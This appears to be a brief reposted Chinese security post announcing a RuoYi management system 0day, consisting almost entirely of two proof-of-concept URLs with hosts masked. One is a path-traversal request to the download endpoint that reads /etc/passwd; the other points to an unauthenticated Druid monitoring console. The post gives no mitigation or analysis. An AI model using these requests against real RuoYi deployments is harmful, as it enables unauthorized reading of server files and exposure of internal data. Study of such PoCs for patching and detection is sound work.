若依CMS 0day 任意文件读取 or 未授权访问
黑白之道
若依管理系统后台任意文件读取
POC:
https://xxx.xxx.xxx.xxx/common/download/resource?resource=/profile/../../../../etc/passwd
若依管理系统未授权访问
POC:
http://xxx.xxx.xxx.xxx/prod-api/druid/index.html
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650509067&idx=3&sn=d23dcd4afb035f4eabe99921ead65e18&chksm=83baeaefb4cd63f9a4cfc967dc10d288f27226a2e860603345117ebd43fe818ccc876612b1a3#rd
如有侵权请联系:admin#unsafe.sh